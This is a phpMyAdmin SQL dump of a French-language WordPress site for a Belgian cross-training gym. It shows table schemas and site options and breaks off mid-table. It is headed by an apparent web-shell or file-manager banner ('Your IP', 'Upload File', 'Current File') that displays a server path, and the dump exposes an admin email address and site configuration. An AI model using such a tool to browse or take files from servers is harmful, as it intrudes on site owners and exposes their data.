Your IP : 216.73.216.162


Current Path : /home/xbodynamge/crosstraining/reservation/db/
Upload File :
Current File : /home/xbodynamge/crosstraining/reservation/db/crosstramsql(3).sql

-- phpMyAdmin SQL Dump
-- version 4.7.3
-- https://www.phpmyadmin.net/
--
-- Hôte : crosstramsql.mysql.db
-- Généré le :  mar. 27 août 2019 à 17:28
-- Version du serveur :  5.6.42-log
-- Version de PHP :  5.6.40-0+deb8u2

SET SQL_MODE = "NO_AUTO_VALUE_ON_ZERO";
SET AUTOCOMMIT = 0;
START TRANSACTION;
SET time_zone = "+00:00";


/*!40101 SET @OLD_CHARACTER_SET_CLIENT=@@CHARACTER_SET_CLIENT */;
/*!40101 SET @OLD_CHARACTER_SET_RESULTS=@@CHARACTER_SET_RESULTS */;
/*!40101 SET @OLD_COLLATION_CONNECTION=@@COLLATION_CONNECTION */;
/*!40101 SET NAMES utf8mb4 */;

--
-- Base de données :  `crosstramsql`
--

-- --------------------------------------------------------

--
-- Structure de la table `ct_commentmeta`
--

CREATE TABLE `ct_commentmeta` (
  `meta_id` bigint(20) UNSIGNED NOT NULL,
  `comment_id` bigint(20) UNSIGNED NOT NULL DEFAULT '0',
  `meta_key` varchar(255) DEFAULT NULL,
  `meta_value` longtext
) ENGINE=MyISAM DEFAULT CHARSET=utf8;

-- --------------------------------------------------------

--
-- Structure de la table `ct_comments`
--

CREATE TABLE `ct_comments` (
  `comment_ID` bigint(20) UNSIGNED NOT NULL,
  `comment_post_ID` bigint(20) UNSIGNED NOT NULL DEFAULT '0',
  `comment_author` tinytext NOT NULL,
  `comment_author_email` varchar(100) NOT NULL DEFAULT '',
  `comment_author_url` varchar(200) NOT NULL DEFAULT '',
  `comment_author_IP` varchar(100) NOT NULL DEFAULT '',
  `comment_date` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `comment_date_gmt` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `comment_content` text NOT NULL,
  `comment_karma` int(11) NOT NULL DEFAULT '0',
  `comment_approved` varchar(20) NOT NULL DEFAULT '1',
  `comment_agent` varchar(255) NOT NULL DEFAULT '',
  `comment_type` varchar(20) NOT NULL DEFAULT '',
  `comment_parent` bigint(20) UNSIGNED NOT NULL DEFAULT '0',
  `user_id` bigint(20) UNSIGNED NOT NULL DEFAULT '0'
) ENGINE=MyISAM DEFAULT CHARSET=utf8;

--
-- Déchargement des données de la table `ct_comments`
--

INSERT INTO `ct_comments` (`comment_ID`, `comment_post_ID`, `comment_author`, `comment_author_email`, `comment_author_url`, `comment_author_IP`, `comment_date`, `comment_date_gmt`, `comment_content`, `comment_karma`, `comment_approved`, `comment_agent`, `comment_type`, `comment_parent`, `user_id`) VALUES
(1, 1, 'Un commentateur WordPress', 'wapuu@wordpress.example', 'https://wordpress.org/', '', '2018-09-02 15:27:07', '2018-09-02 13:27:07', 'Bonjour, ceci est un commentaire.\nPour débuter avec la modération, la modification et la suppression de commentaires, veuillez visiter l’écran des Commentaires dans le Tableau de bord.\nLes avatars des personnes qui commentent arrivent depuis <a href=\"https://gravatar.com\">Gravatar</a>.', 0, '1', '', '', 0, 0);

-- --------------------------------------------------------

--
-- Structure de la table `ct_links`
--

CREATE TABLE `ct_links` (
  `link_id` bigint(20) UNSIGNED NOT NULL,
  `link_url` varchar(255) NOT NULL DEFAULT '',
  `link_name` varchar(255) NOT NULL DEFAULT '',
  `link_image` varchar(255) NOT NULL DEFAULT '',
  `link_target` varchar(25) NOT NULL DEFAULT '',
  `link_description` varchar(255) NOT NULL DEFAULT '',
  `link_visible` varchar(20) NOT NULL DEFAULT 'Y',
  `link_owner` bigint(20) UNSIGNED NOT NULL DEFAULT '1',
  `link_rating` int(11) NOT NULL DEFAULT '0',
  `link_updated` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `link_rel` varchar(255) NOT NULL DEFAULT '',
  `link_notes` mediumtext NOT NULL,
  `link_rss` varchar(255) NOT NULL DEFAULT ''
) ENGINE=MyISAM DEFAULT CHARSET=utf8;

-- --------------------------------------------------------

--
-- Structure de la table `ct_options`
--

CREATE TABLE `ct_options` (
  `option_id` bigint(20) UNSIGNED NOT NULL,
  `option_name` varchar(191) NOT NULL DEFAULT '',
  `option_value` longtext NOT NULL,
  `autoload` varchar(20) NOT NULL DEFAULT 'yes'
) ENGINE=MyISAM DEFAULT CHARSET=utf8;

--
-- Déchargement des données de la table `ct_options`
--

INSERT INTO `ct_options` (`option_id`, `option_name`, `option_value`, `autoload`) VALUES
(1, 'siteurl', 'http://dev.crosstrainingcenter.be', 'yes'),
(2, 'home', 'http://dev.crosstrainingcenter.be', 'yes'),
(3, 'blogname', 'Cross Training Namur', 'yes'),
(4, 'blogdescription', 'Un site utilisant WordPress', 'yes'),
(5, 'users_can_register', '0', 'yes'),
(6, 'admin_email', 'stv@otvr.net', 'yes'),
(7, 'start_of_week', '1', 'yes'),
(8, 'use_balanceTags', '0', 'yes'),
(9, 'use_smilies', '1', 'yes'),
(10, 'require_name_email', '1', 'yes'),
(11, 'comments_notify', '1', 'yes'),
(12, 'posts_per_rss', '10', 'yes'),
(13, 'rss_use_excerpt', '0', 'yes'),
(14, 'mailserver_url', 'mail.example.com', 'yes'),
(15, 'mailserver_login', 'login@example.com', 'yes'),
(16, 'mailserver_pass', 'password', 'yes'),
(17, 'mailserver_port', '110', 'yes'),
(18, 'default_category', '1', 'yes'),
(19, 'default_comment_status', 'open', 'yes'),
(20, 'default_ping_status', 'open', 'yes'),
(21, 'default_pingback_flag', '1', 'yes'),
(22, 'posts_per_page', '10', 'yes'),
(23, 'date_format', 'j F Y', 'yes'),
(24, 'time_format', 'G \\h i \\m\\i\\n', 'yes'),
(25, 'links_updated_date_format', 'j F Y G \\h i \\m\\i\\n', 'yes'),
(26, 'comment_moderation', '0', 'yes'),
(27, 'moderation_notify', '1', 'yes'),
(28, 'permalink_structure', '/%year%/%monthnum%/%day%/%postname%/', 'yes'),
(29, 'rewrite_rules', 'a:114:{s:11:\"^wp-json/?$\";s:22:\"index.php?rest_route=/\";s:14:\"^wp-json/(.*)?\";s:33:\"index.php?rest_route=/$matches[1]\";s:21:\"^index.php/wp-json/?$\";s:22:\"index.php?rest_route=/\";s:24:\"^index.php/wp-json/(.*)?\";s:33:\"index.php?rest_route=/$matches[1]\";s:13:\"pf_contact/?$\";s:30:\"index.php?post_type=pf_contact\";s:43:\"pf_contact/feed/(feed|rdf|rss|rss2|atom)/?$\";s:47:\"index.php?post_type=pf_contact&feed=$matches[1]\";s:38:\"pf_contact/(feed|rdf|rss|rss2|atom)/?$\";s:47:\"index.php?post_type=pf_contact&feed=$matches[1]\";s:30:\"pf_contact/page/([0-9]{1,})/?$\";s:48:\"index.php?post_type=pf_contact&paged=$matches[1]\";s:47:\"category/(.+?)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:52:\"index.php?category_name=$matches[1]&feed=$matches[2]\";s:42:\"category/(.+?)/(feed|rdf|rss|rss2|atom)/?$\";s:52:\"index.php?category_name=$matches[1]&feed=$matches[2]\";s:23:\"category/(.+?)/embed/?$\";s:46:\"index.php?category_name=$matches[1]&embed=true\";s:35:\"category/(.+?)/page/?([0-9]{1,})/?$\";s:53:\"index.php?category_name=$matches[1]&paged=$matches[2]\";s:17:\"category/(.+?)/?$\";s:35:\"index.php?category_name=$matches[1]\";s:44:\"tag/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:42:\"index.php?tag=$matches[1]&feed=$matches[2]\";s:39:\"tag/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:42:\"index.php?tag=$matches[1]&feed=$matches[2]\";s:20:\"tag/([^/]+)/embed/?$\";s:36:\"index.php?tag=$matches[1]&embed=true\";s:32:\"tag/([^/]+)/page/?([0-9]{1,})/?$\";s:43:\"index.php?tag=$matches[1]&paged=$matches[2]\";s:14:\"tag/([^/]+)/?$\";s:25:\"index.php?tag=$matches[1]\";s:45:\"type/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:50:\"index.php?post_format=$matches[1]&feed=$matches[2]\";s:40:\"type/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:50:\"index.php?post_format=$matches[1]&feed=$matches[2]\";s:21:\"type/([^/]+)/embed/?$\";s:44:\"index.php?post_format=$matches[1]&embed=true\";s:33:\"type/([^/]+)/page/?([0-9]{1,})/?$\";s:51:\"index.php?post_format=$matches[1]&paged=$matches[2]\";s:15:\"type/([^/]+)/?$\";s:33:\"index.php?post_format=$matches[1]\";s:38:\"pf_contact/[^/]+/attachment/([^/]+)/?$\";s:32:\"index.php?attachment=$matches[1]\";s:48:\"pf_contact/[^/]+/attachment/([^/]+)/trackback/?$\";s:37:\"index.php?attachment=$matches[1]&tb=1\";s:68:\"pf_contact/[^/]+/attachment/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:63:\"pf_contact/[^/]+/attachment/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:63:\"pf_contact/[^/]+/attachment/([^/]+)/comment-page-([0-9]{1,})/?$\";s:50:\"index.php?attachment=$matches[1]&cpage=$matches[2]\";s:44:\"pf_contact/[^/]+/attachment/([^/]+)/embed/?$\";s:43:\"index.php?attachment=$matches[1]&embed=true\";s:27:\"pf_contact/([^/]+)/embed/?$\";s:43:\"index.php?pf_contact=$matches[1]&embed=true\";s:31:\"pf_contact/([^/]+)/trackback/?$\";s:37:\"index.php?pf_contact=$matches[1]&tb=1\";s:51:\"pf_contact/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?pf_contact=$matches[1]&feed=$matches[2]\";s:46:\"pf_contact/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?pf_contact=$matches[1]&feed=$matches[2]\";s:39:\"pf_contact/([^/]+)/page/?([0-9]{1,})/?$\";s:50:\"index.php?pf_contact=$matches[1]&paged=$matches[2]\";s:46:\"pf_contact/([^/]+)/comment-page-([0-9]{1,})/?$\";s:50:\"index.php?pf_contact=$matches[1]&cpage=$matches[2]\";s:35:\"pf_contact/([^/]+)(?:/([0-9]+))?/?$\";s:49:\"index.php?pf_contact=$matches[1]&page=$matches[2]\";s:27:\"pf_contact/[^/]+/([^/]+)/?$\";s:32:\"index.php?attachment=$matches[1]\";s:37:\"pf_contact/[^/]+/([^/]+)/trackback/?$\";s:37:\"index.php?attachment=$matches[1]&tb=1\";s:57:\"pf_contact/[^/]+/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:52:\"pf_contact/[^/]+/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:52:\"pf_contact/[^/]+/([^/]+)/comment-page-([0-9]{1,})/?$\";s:50:\"index.php?attachment=$matches[1]&cpage=$matches[2]\";s:33:\"pf_contact/[^/]+/([^/]+)/embed/?$\";s:43:\"index.php?attachment=$matches[1]&embed=true\";s:12:\"robots\\.txt$\";s:18:\"index.php?robots=1\";s:48:\".*wp-(atom|rdf|rss|rss2|feed|commentsrss2)\\.php$\";s:18:\"index.php?feed=old\";s:20:\".*wp-app\\.php(/.*)?$\";s:19:\"index.php?error=403\";s:18:\".*wp-register.php$\";s:23:\"index.php?register=true\";s:32:\"feed/(feed|rdf|rss|rss2|atom)/?$\";s:27:\"index.php?&feed=$matches[1]\";s:27:\"(feed|rdf|rss|rss2|atom)/?$\";s:27:\"index.php?&feed=$matches[1]\";s:8:\"embed/?$\";s:21:\"index.php?&embed=true\";s:20:\"page/?([0-9]{1,})/?$\";s:28:\"index.php?&paged=$matches[1]\";s:27:\"comment-page-([0-9]{1,})/?$\";s:38:\"index.php?&page_id=4&cpage=$matches[1]\";s:41:\"comments/feed/(feed|rdf|rss|rss2|atom)/?$\";s:42:\"index.php?&feed=$matches[1]&withcomments=1\";s:36:\"comments/(feed|rdf|rss|rss2|atom)/?$\";s:42:\"index.php?&feed=$matches[1]&withcomments=1\";s:17:\"comments/embed/?$\";s:21:\"index.php?&embed=true\";s:44:\"search/(.+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:40:\"index.php?s=$matches[1]&feed=$matches[2]\";s:39:\"search/(.+)/(feed|rdf|rss|rss2|atom)/?$\";s:40:\"index.php?s=$matches[1]&feed=$matches[2]\";s:20:\"search/(.+)/embed/?$\";s:34:\"index.php?s=$matches[1]&embed=true\";s:32:\"search/(.+)/page/?([0-9]{1,})/?$\";s:41:\"index.php?s=$matches[1]&paged=$matches[2]\";s:14:\"search/(.+)/?$\";s:23:\"index.php?s=$matches[1]\";s:47:\"author/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:50:\"index.php?author_name=$matches[1]&feed=$matches[2]\";s:42:\"author/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:50:\"index.php?author_name=$matches[1]&feed=$matches[2]\";s:23:\"author/([^/]+)/embed/?$\";s:44:\"index.php?author_name=$matches[1]&embed=true\";s:35:\"author/([^/]+)/page/?([0-9]{1,})/?$\";s:51:\"index.php?author_name=$matches[1]&paged=$matches[2]\";s:17:\"author/([^/]+)/?$\";s:33:\"index.php?author_name=$matches[1]\";s:69:\"([0-9]{4})/([0-9]{1,2})/([0-9]{1,2})/feed/(feed|rdf|rss|rss2|atom)/?$\";s:80:\"index.php?year=$matches[1]&monthnum=$matches[2]&day=$matches[3]&feed=$matches[4]\";s:64:\"([0-9]{4})/([0-9]{1,2})/([0-9]{1,2})/(feed|rdf|rss|rss2|atom)/?$\";s:80:\"index.php?year=$matches[1]&monthnum=$matches[2]&day=$matches[3]&feed=$matches[4]\";s:45:\"([0-9]{4})/([0-9]{1,2})/([0-9]{1,2})/embed/?$\";s:74:\"index.php?year=$matches[1]&monthnum=$matches[2]&day=$matches[3]&embed=true\";s:57:\"([0-9]{4})/([0-9]{1,2})/([0-9]{1,2})/page/?([0-9]{1,})/?$\";s:81:\"index.php?year=$matches[1]&monthnum=$matches[2]&day=$matches[3]&paged=$matches[4]\";s:39:\"([0-9]{4})/([0-9]{1,2})/([0-9]{1,2})/?$\";s:63:\"index.php?year=$matches[1]&monthnum=$matches[2]&day=$matches[3]\";s:56:\"([0-9]{4})/([0-9]{1,2})/feed/(feed|rdf|rss|rss2|atom)/?$\";s:64:\"index.php?year=$matches[1]&monthnum=$matches[2]&feed=$matches[3]\";s:51:\"([0-9]{4})/([0-9]{1,2})/(feed|rdf|rss|rss2|atom)/?$\";s:64:\"index.php?year=$matches[1]&monthnum=$matches[2]&feed=$matches[3]\";s:32:\"([0-9]{4})/([0-9]{1,2})/embed/?$\";s:58:\"index.php?year=$matches[1]&monthnum=$matches[2]&embed=true\";s:44:\"([0-9]{4})/([0-9]{1,2})/page/?([0-9]{1,})/?$\";s:65:\"index.php?year=$matches[1]&monthnum=$matches[2]&paged=$matches[3]\";s:26:\"([0-9]{4})/([0-9]{1,2})/?$\";s:47:\"index.php?year=$matches[1]&monthnum=$matches[2]\";s:43:\"([0-9]{4})/feed/(feed|rdf|rss|rss2|atom)/?$\";s:43:\"index.php?year=$matches[1]&feed=$matches[2]\";s:38:\"([0-9]{4})/(feed|rdf|rss|rss2|atom)/?$\";s:43:\"index.php?year=$matches[1]&feed=$matches[2]\";s:19:\"([0-9]{4})/embed/?$\";s:37:\"index.php?year=$matches[1]&embed=true\";s:31:\"([0-9]{4})/page/?([0-9]{1,})/?$\";s:44:\"index.php?year=$matches[1]&paged=$matches[2]\";s:13:\"([0-9]{4})/?$\";s:26:\"index.php?year=$matches[1]\";s:58:\"[0-9]{4}/[0-9]{1,2}/[0-9]{1,2}/[^/]+/attachment/([^/]+)/?$\";s:32:\"index.php?attachment=$matches[1]\";s:68:\"[0-9]{4}/[0-9]{1,2}/[0-9]{1,2}/[^/]+/attachment/([^/]+)/trackback/?$\";s:37:\"index.php?attachment=$matches[1]&tb=1\";s:88:\"[0-9]{4}/[0-9]{1,2}/[0-9]{1,2}/[^/]+/attachment/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:83:\"[0-9]{4}/[0-9]{1,2}/[0-9]{1,2}/[^/]+/attachment/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:83:\"[0-9]{4}/[0-9]{1,2}/[0-9]{1,2}/[^/]+/attachment/([^/]+)/comment-page-([0-9]{1,})/?$\";s:50:\"index.php?attachment=$matches[1]&cpage=$matches[2]\";s:64:\"[0-9]{4}/[0-9]{1,2}/[0-9]{1,2}/[^/]+/attachment/([^/]+)/embed/?$\";s:43:\"index.php?attachment=$matches[1]&embed=true\";s:53:\"([0-9]{4})/([0-9]{1,2})/([0-9]{1,2})/([^/]+)/embed/?$\";s:91:\"index.php?year=$matches[1]&monthnum=$matches[2]&day=$matches[3]&name=$matches[4]&embed=true\";s:57:\"([0-9]{4})/([0-9]{1,2})/([0-9]{1,2})/([^/]+)/trackback/?$\";s:85:\"index.php?year=$matches[1]&monthnum=$matches[2]&day=$matches[3]&name=$matches[4]&tb=1\";s:77:\"([0-9]{4})/([0-9]{1,2})/([0-9]{1,2})/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:97:\"index.php?year=$matches[1]&monthnum=$matches[2]&day=$matches[3]&name=$matches[4]&feed=$matches[5]\";s:72:\"([0-9]{4})/([0-9]{1,2})/([0-9]{1,2})/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:97:\"index.php?year=$matches[1]&monthnum=$matches[2]&day=$matches[3]&name=$matches[4]&feed=$matches[5]\";s:65:\"([0-9]{4})/([0-9]{1,2})/([0-9]{1,2})/([^/]+)/page/?([0-9]{1,})/?$\";s:98:\"index.php?year=$matches[1]&monthnum=$matches[2]&day=$matches[3]&name=$matches[4]&paged=$matches[5]\";s:72:\"([0-9]{4})/([0-9]{1,2})/([0-9]{1,2})/([^/]+)/comment-page-([0-9]{1,})/?$\";s:98:\"index.php?year=$matches[1]&monthnum=$matches[2]&day=$matches[3]&name=$matches[4]&cpage=$matches[5]\";s:61:\"([0-9]{4})/([0-9]{1,2})/([0-9]{1,2})/([^/]+)(?:/([0-9]+))?/?$\";s:97:\"index.php?year=$matches[1]&monthnum=$matches[2]&day=$matches[3]&name=$matches[4]&page=$matches[5]\";s:47:\"[0-9]{4}/[0-9]{1,2}/[0-9]{1,2}/[^/]+/([^/]+)/?$\";s:32:\"index.php?attachment=$matches[1]\";s:57:\"[0-9]{4}/[0-9]{1,2}/[0-9]{1,2}/[^/]+/([^/]+)/trackback/?$\";s:37:\"index.php?attachment=$matches[1]&tb=1\";s:77:\"[0-9]{4}/[0-9]{1,2}/[0-9]{1,2}/[^/]+/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:72:\"[0-9]{4}/[0-9]{1,2}/[0-9]{1,2}/[^/]+/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:72:\"[0-9]{4}/[0-9]{1,2}/[0-9]{1,2}/[^/]+/([^/]+)/comment-page-([0-9]{1,})/?$\";s:50:\"index.php?attachment=$matches[1]&cpage=$matches[2]\";s:53:\"[0-9]{4}/[0-9]{1,2}/[0-9]{1,2}/[^/]+/([^/]+)/embed/?$\";s:43:\"index.php?attachment=$matches[1]&embed=true\";s:64:\"([0-9]{4})/([0-9]{1,2})/([0-9]{1,2})/comment-page-([0-9]{1,})/?$\";s:81:\"index.php?year=$matches[1]&monthnum=$matches[2]&day=$matches[3]&cpage=$matches[4]\";s:51:\"([0-9]{4})/([0-9]{1,2})/comment-page-([0-9]{1,})/?$\";s:65:\"index.php?year=$matches[1]&monthnum=$matches[2]&cpage=$matches[3]\";s:38:\"([0-9]{4})/comment-page-([0-9]{1,})/?$\";s:44:\"index.php?year=$matches[1]&cpage=$matches[2]\";s:27:\".?.+?/attachment/([^/]+)/?$\";s:32:\"index.php?attachment=$matches[1]\";s:37:\".?.+?/attachment/([^/]+)/trackback/?$\";s:37:\"index.php?attachment=$matches[1]&tb=1\";s:57:\".?.+?/attachment/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:52:\".?.+?/attachment/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:52:\".?.+?/attachment/([^/]+)/comment-page-([0-9]{1,})/?$\";s:50:\"index.php?attachment=$matches[1]&cpage=$matches[2]\";s:33:\".?.+?/attachment/([^/]+)/embed/?$\";s:43:\"index.php?attachment=$matches[1]&embed=true\";s:16:\"(.?.+?)/embed/?$\";s:41:\"index.php?pagename=$matches[1]&embed=true\";s:20:\"(.?.+?)/trackback/?$\";s:35:\"index.php?pagename=$matches[1]&tb=1\";s:40:\"(.?.+?)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:47:\"index.php?pagename=$matches[1]&feed=$matches[2]\";s:35:\"(.?.+?)/(feed|rdf|rss|rss2|atom)/?$\";s:47:\"index.php?pagename=$matches[1]&feed=$matches[2]\";s:28:\"(.?.+?)/page/?([0-9]{1,})/?$\";s:48:\"index.php?pagename=$matches[1]&paged=$matches[2]\";s:35:\"(.?.+?)/comment-page-([0-9]{1,})/?$\";s:48:\"index.php?pagename=$matches[1]&cpage=$matches[2]\";s:24:\"(.?.+?)(?:/([0-9]+))?/?$\";s:47:\"index.php?pagename=$matches[1]&page=$matches[2]\";}', 'yes'),
(30, 'hack_file', '0', 'yes'),
(31, 'blog_charset', 'UTF-8', 'yes'),
(32, 'moderation_keys', '', 'no'),
(33, 'active_plugins', 'a:2:{i:0;s:29:\"pirate-forms/pirate-forms.php\";i:1;s:43:\"themeisle-companion/themeisle-companion.php\";}', 'yes'),
(34, 'category_base', '', 'yes'),
(35, 'ping_sites', 'http://rpc.pingomatic.com/', 'yes'),
(36, 'comment_max_links', '2', 'yes'),
(37, 'gmt_offset', '0', 'yes'),
(38, 'default_email_category', '1', 'yes'),
(39, 'recently_edited', '', 'no'),
(40, 'template', 'zerif-lite', 'yes'),
(41, 'stylesheet', 'zerif-lite', 'yes'),
(42, 'comment_whitelist', '1', 'yes'),
(43, 'blacklist_keys', '', 'no'),
(44, 'comment_registration', '0', 'yes'),
(45, 'html_type', 'text/html', 'yes'),
(46, 'use_trackback', '0', 'yes'),
(47, 'default_role', 'subscriber', 'yes'),
(48, 'db_version', '38590', 'yes'),
(49, 'uploads_use_yearmonth_folders', '1', 'yes'),
(50, 'upload_path', '', 'yes'),
(51, 'blog_public', '1', 'yes'),
(52, 'default_link_category', '2', 'yes'),
(53, 'show_on_front', 'page', 'yes'),
(54, 'tag_base', '', 'yes'),
(55, 'show_avatars', '1', 'yes'),
(56, 'avatar_rating', 'G', 'yes'),
(57, 'upload_url_path', '', 'yes'),
(58, 'thumbnail_size_w', '150', 'yes'),
(59, 'thumbnail_size_h', '150', 'yes'),
(60, 'thumbnail_crop', '1', 'yes'),
(61, 'medium_size_w', '300', 'yes'),
(62, 'medium_size_h', '300', 'yes'),
(63, 'avatar_default', 'mystery', 'yes'),
(64, 'large_size_w', '1024', 'yes'),
(65, 'large_size_h', '1024', 'yes'),
(66, 'image_default_link_type', 'none', 'yes'),
(67, 'image_default_size', '', 'yes'),
(68, 'image_default_align', '', 'yes'),
(69, 'close_comments_for_old_posts', '0', 'yes'),
(70, 'close_comments_days_old', '14', 'yes'),
(71, 'thread_comments', '1', 'yes'),
(72, 'thread_comments_depth', '5', 'yes'),
(73, 'page_comments', '0', 'yes'),
(74, 'comments_per_page', '50', 'yes'),
(75, 'default_comments_page', 'newest', 'yes'),
(76, 'comment_order', 'asc', 'yes'),
(77, 'sticky_posts', 'a:0:{}', 'yes'),
(78, 'widget_categories', 'a:2:{i:2;a:4:{s:5:\"title\";s:0:\"\";s:5:\"count\";i:0;s:12:\"hierarchical\";i:0;s:8:\"dropdown\";i:0;}s:12:\"_multiwidget\";i:1;}', 'yes'),
(79, 'widget_text', 'a:2:{i:1;a:0:{}s:12:\"_multiwidget\";i:1;}', 'yes'),
(80, 'widget_rss', 'a:2:{i:1;a:0:{}s:12:\"_multiwidget\";i:1;}', 'yes'),
(81, 'uninstall_plugins', 'a:0:{}', 'no'),
(82, 'timezone_string', 'Europe/Brussels', 'yes'),
(83, 'page_for_posts', '5', 'yes'),
(84, 'page_on_front', '4', 'yes'),
(85, 'default_post_format', '0', 'yes'),
(86, 'link_manager_enabled', '0', 'yes'),
(87, 'finished_splitting_shared_terms', '1', 'yes'),
(88, 'site_icon', '0', 'yes'),
(89, 'medium_large_size_w', '768', 'yes'),
(90, 'medium_large_size_h', '0', 'yes'),
(91, 'initial_db_version', '38590', 'yes'),
(92, 'ct_user_roles', 'a:5:{s:13:\"administrator\";a:2:{s:4:\"name\";s:13:\"Administrator\";s:12:\"capabilities\";a:61:{s:13:\"switch_themes\";b:1;s:11:\"edit_themes\";b:1;s:16:\"activate_plugins\";b:1;s:12:\"edit_plugins\";b:1;s:10:\"edit_users\";b:1;s:10:\"edit_files\";b:1;s:14:\"manage_options\";b:1;s:17:\"moderate_comments\";b:1;s:17:\"manage_categories\";b:1;s:12:\"manage_links\";b:1;s:12:\"upload_files\";b:1;s:6:\"import\";b:1;s:15:\"unfiltered_html\";b:1;s:10:\"edit_posts\";b:1;s:17:\"edit_others_posts\";b:1;s:20:\"edit_published_posts\";b:1;s:13:\"publish_posts\";b:1;s:10:\"edit_pages\";b:1;s:4:\"read\";b:1;s:8:\"level_10\";b:1;s:7:\"level_9\";b:1;s:7:\"level_8\";b:1;s:7:\"level_7\";b:1;s:7:\"level_6\";b:1;s:7:\"level_5\";b:1;s:7:\"level_4\";b:1;s:7:\"level_3\";b:1;s:7:\"level_2\";b:1;s:7:\"level_1\";b:1;s:7:\"level_0\";b:1;s:17:\"edit_others_pages\";b:1;s:20:\"edit_published_pages\";b:1;s:13:\"publish_pages\";b:1;s:12:\"delete_pages\";b:1;s:19:\"delete_others_pages\";b:1;s:22:\"delete_published_pages\";b:1;s:12:\"delete_posts\";b:1;s:19:\"delete_others_posts\";b:1;s:22:\"delete_published_posts\";b:1;s:20:\"delete_private_posts\";b:1;s:18:\"edit_private_posts\";b:1;s:18:\"read_private_posts\";b:1;s:20:\"delete_private_pages\";b:1;s:18:\"edit_private_pages\";b:1;s:18:\"read_private_pages\";b:1;s:12:\"delete_users\";b:1;s:12:\"create_users\";b:1;s:17:\"unfiltered_upload\";b:1;s:14:\"edit_dashboard\";b:1;s:14:\"update_plugins\";b:1;s:14:\"delete_plugins\";b:1;s:15:\"install_plugins\";b:1;s:13:\"update_themes\";b:1;s:14:\"install_themes\";b:1;s:11:\"update_core\";b:1;s:10:\"list_users\";b:1;s:12:\"remove_users\";b:1;s:13:\"promote_users\";b:1;s:18:\"edit_theme_options\";b:1;s:13:\"delete_themes\";b:1;s:6:\"export\";b:1;}}s:6:\"editor\";a:2:{s:4:\"name\";s:6:\"Editor\";s:12:\"capabilities\";a:34:{s:17:\"moderate_comments\";b:1;s:17:\"manage_categories\";b:1;s:12:\"manage_links\";b:1;s:12:\"upload_files\";b:1;s:15:\"unfiltered_html\";b:1;s:10:\"edit_posts\";b:1;s:17:\"edit_others_posts\";b:1;s:20:\"edit_published_posts\";b:1;s:13:\"publish_posts\";b:1;s:10:\"edit_pages\";b:1;s:4:\"read\";b:1;s:7:\"level_7\";b:1;s:7:\"level_6\";b:1;s:7:\"level_5\";b:1;s:7:\"level_4\";b:1;s:7:\"level_3\";b:1;s:7:\"level_2\";b:1;s:7:\"level_1\";b:1;s:7:\"level_0\";b:1;s:17:\"edit_others_pages\";b:1;s:20:\"edit_published_pages\";b:1;s:13:\"publish_pages\";b:1;s:12:\"delete_pages\";b:1;s:19:\"delete_others_pages\";b:1;s:22:\"delete_published_pages\";b:1;s:12:\"delete_posts\";b:1;s:19:\"delete_others_posts\";b:1;s:22:\"delete_published_posts\";b:1;s:20:\"delete_private_posts\";b:1;s:18:\"edit_private_posts\";b:1;s:18:\"read_private_posts\";b:1;s:20:\"delete_private_pages\";b:1;s:18:\"edit_private_pages\";b:1;s:18:\"read_private_pages\";b:1;}}s:6:\"author\";a:2:{s:4:\"name\";s:6:\"Author\";s:12:\"capabilities\";a:10:{s:12:\"upload_files\";b:1;s:10:\"edit_posts\";b:1;s:20:\"edit_published_posts\";b:1;s:13:\"publish_posts\";b:1;s:4:\"read\";b:1;s:7:\"level_2\";b:1;s:7:\"level_1\";b:1;s:7:\"level_0\";b:1;s:12:\"delete_posts\";b:1;s:22:\"delete_published_posts\";b:1;}}s:11:\"contributor\";a:2:{s:4:\"name\";s:11:\"Contributor\";s:12:\"capabilities\";a:5:{s:10:\"edit_posts\";b:1;s:4:\"read\";b:1;s:7:\"level_1\";b:1;s:7:\"level_0\";b:1;s:12:\"delete_posts\";b:1;}}s:10:\"subscriber\";a:2:{s:4:\"name\";s:10:\"Subscriber\";s:12:\"capabilities\";a:2:{s:4:\"read\";b:1;s:7:\"level_0\";b:1;}}}', 'yes'),
(93, 'fresh_site', '0', 'yes'),
(94, 'WPLANG', 'fr_BE', 'yes'),
(95, 'widget_search', 'a:2:{i:2;a:1:{s:5:\"title\";s:0:\"\";}s:12:\"_multiwidget\";i:1;}', 'yes'),
